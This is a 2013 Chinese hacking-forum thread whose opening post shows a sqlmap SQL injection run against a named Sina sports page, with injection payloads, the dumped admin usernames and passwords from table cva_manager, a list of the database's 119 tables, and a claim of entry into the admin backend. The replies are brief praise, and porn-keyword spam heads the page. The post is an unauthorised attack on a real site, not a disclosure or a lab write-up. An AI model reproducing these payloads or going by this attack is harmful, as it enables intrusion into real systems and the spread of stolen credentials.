久久精品中文字幕,狠狠色丁香婷婷综合,精品国产制服丝袜高跟,国内精品久久久久久久久齐齐 ,国模冰莲极品自慰人体

灰鴿子遠(yuǎn)程控制軟件

 找回密碼
 立即注冊(cè)

QQ登錄

只需一步,快速開始

查看: 22038|回復(fù): 9
打印 上一主題 下一主題

新浪的一個(gè)Sql注入,可進(jìn)入拿后臺(tái)

[復(fù)制鏈接]
跳轉(zhuǎn)到指定樓層
樓主
發(fā)表于 2013-8-9 22:16:04 | 只看該作者 |只看大圖 回帖獎(jiǎng)勵(lì) |倒序?yàn)g覽 |閱讀模式
root@kali:~# sqlmap -u "http://others.sports.sina.com.cn/cva/paper.php?id=264" --dump -C "Manager,PassWord" -T "cva_manager" -D "otherssports"
新浪的一個(gè)Sql注入,可進(jìn)入拿后臺(tái)


    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

    http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


  starting at 18:10:41



[18:10:41] [INFO] resuming back-end DBMS 'mysql'

[18:10:41] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=264') AND 5215=5215 AND ('eOJb'='eOJb



    Type: UNION query

    Title: MySQL UNION query (NULL) - 36 columns

    Payload: id=-7030') UNION ALL SELECT CONCAT(0x3a786c763a,0x424f4778474d484c6157,0x3a63707a3a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#



    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: id=264') AND SLEEP(5) AND ('grRQ'='grRQ

---

[18:10:42] [INFO] the back-end DBMS is MySQL

web application technology: Apache

back-end DBMS: MySQL 5.0.11

[18:10:42] [INFO] fetching columns 'Manager, PassWord' for table 'cva_manager' in database 'otherssports'

[18:10:42] [INFO] the SQL query used returns 2 entries

[18:10:42] [INFO] retrieved: "Manager","varchar(20)"

[18:10:42] [INFO] retrieved: "PassWord","varchar(20)"

[18:10:42] [INFO] fetching entries of column(s) 'Manager, PassWord' for table 'cva_manager' in database 'otherssports'

[18:10:42] [INFO] the SQL query used returns 2 entries

[18:10:42] [INFO] retrieved: "cva","fgrtert$4b345b"

[18:10:43] [INFO] retrieved: "cvadmin","fdgest34534sdftt54dg"

[18:10:43] [INFO] analyzing table dump for possible password hashes            

Database: otherssports

Table: cva_manager

[2 entries]

+---------+----------------------+

| Manager | PassWord             |

+---------+----------------------+

| cva     | fgrtert$4b345b       |

| cvadmin | fdgest34534sdftt54dg |

+---------+----------------------+




web application technology: Apache

back-end DBMS: MySQL 5.0.11

[18:06:26] [INFO] fetching tables for database: 'otherssports'

[18:06:26] [INFO] the SQL query used returns 119 entries

Database: otherssports                                                         

[119 tables]

+------------------------------+

| admins                       |

| admins1                      |

| cba_double                   |

| cba_member                   |

| cba_member_info              |

| cba_result                   |

| cba_result_data              |

| cba_result_team              |

| chels_fixture                |

| chels_mail                   |

| chels_news                   |

| chels_picture                |

| chels_player                 |

| chels_player_club            |

| chels_player_season          |

| chels_score                  |

| chels_user                   |

| chels_word                   |

| countrystatisticmedal        |

| cva_area                     |

| cva_groups                   |

| cva_league                   |

| cva_manager                  |

| cva_match                    |

| cva_match_0809               |

| cva_match_0910               |

| cva_match_bak                |

| cva_member                   |

| cva_member_0809              |

| cva_member_0910              |

| cva_member_bak               |

| cva_para                     |

| cva_result                   |

| cva_result_0809              |

| cva_result_0910              |

| cva_result_bak               |

| cva_team                     |

| cva_team_0809                |

| cva_team_0910                |

| cva_team_bak                 |

| doha_country                 |

| doha_member                  |

| doha_result                  |

| doha_sports                  |

| dpool_check_db               |

| fivb_chinese                 |

| fivb_match                   |

| fivb_playerorder             |

| fivb_playerorder_1           |

| fivb_rank                    |

| football_news                |

| goaltv_login                 |

| guess_answer                 |

| guess_news                   |

| guess_question               |

| guess_title                  |

| guess_user                   |

| guess_user_ans               |

| head_2_head                  |

| head_player                  |

| historymedal                 |

| historymedal_bak             |

| historymedal_copy            |

| historymedalteam             |

| iaaf_match                   |

| iaaf_record                  |

| iaaf_result                  |

| inter_allscore               |

| inter_chinese                |

| inter_match                  |

| inter_news                   |

| inter_pic                    |

| inter_player                 |

| inter_playerinfo             |

| inter_user                   |

| ittf_live                    |

| ittf_player                  |

| key_channel                  |

| key_record                   |

| key_word_url                 |

| live_photo                   |

| live_sports                  |

| match                        |

| match_score                  |

| match_team                   |

| match_type                   |

| mix_children_record          |

| mix_children_user            |

| personstatisticmedal         |

| rank_atp                     |

| rank_atp_d                   |

| rank_atp_date                |

| rank_atp_prize               |

| rank_bmf                     |

| rank_bmf_d                   |

| rank_bmf_date                |

| rank_cttsl                   |

| rank_fifa                    |

| rank_golf                    |

| rank_ittf                    |

| rank_link                    |

| rank_word                    |

| rank_wta                     |

| rank_wta_d                   |

| rank_wta_date                |

| rank_wta_prize               |

| record_swimming              |

| record_swimming_bak_20110106 |

| reporter_user                |

| shidefc_user                 |

| team_player                  |

| tennis_live                  |

| tennis_match                 |

| tennis_news                  |

| tennis_player                |

| tennis_schedual              |

| tennis_user                  |

| tennis_user_match            |

| tennis_user_player           |

+------------------------------+


測(cè)試可以成功進(jìn)入后臺(tái)
評(píng)帖賺銀幣(0) 收起
分享到:  QQ好友和群QQ好友和群
收藏收藏
沙發(fā)
發(fā)表于 2013-8-13 18:30:19 | 只看該作者
不錯(cuò) 學(xué)習(xí)了
評(píng)帖賺銀幣(0) 收起
板凳
發(fā)表于 2013-8-14 10:48:49 | 只看該作者
不錯(cuò)不錯(cuò)不錯(cuò)不錯(cuò)不錯(cuò)學(xué)習(xí)一下
評(píng)帖賺銀幣(0) 收起
5#
發(fā)表于 2013-8-30 15:22:57 | 只看該作者
不錯(cuò)不錯(cuò)不錯(cuò)不錯(cuò)不錯(cuò)學(xué)習(xí)一下
評(píng)帖賺銀幣(0) 收起
6#
發(fā)表于 2013-8-31 10:21:57 | 只看該作者
樓主用的是什么掃描器?
評(píng)帖賺銀幣(0) 收起
7#
發(fā)表于 2013-11-14 16:07:11 | 只看該作者
aaaaaaaaaaaaaaaaaaaaaaaaaaaaa
評(píng)帖賺銀幣(0) 收起
8#
發(fā)表于 2013-11-17 17:44:07 | 只看該作者
天啊  一點(diǎn)都看不懂 我真是菜鳥得不能再菜鳥了··
評(píng)帖賺銀幣(0) 收起
9#
發(fā)表于 2013-12-17 17:40:17 | 只看該作者
好  真好   我想下
評(píng)帖賺銀幣(0) 收起
10#
發(fā)表于 2013-12-24 19:09:51 | 只看該作者
好深?yuàn)W啊。我是來拿分的!
評(píng)帖賺銀幣(0) 收起

本版積分規(guī)則

Archiver|手機(jī)版|小黑屋|灰鴿子遠(yuǎn)程控制軟件|灰鴿子遠(yuǎn)程控制軟件 ( 魯ICP備14000061號(hào)-4 )

GMT+8, 2025-7-2 00:11 , Processed in 0.112984 second(s), 43 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回復(fù) 返回頂部 返回列表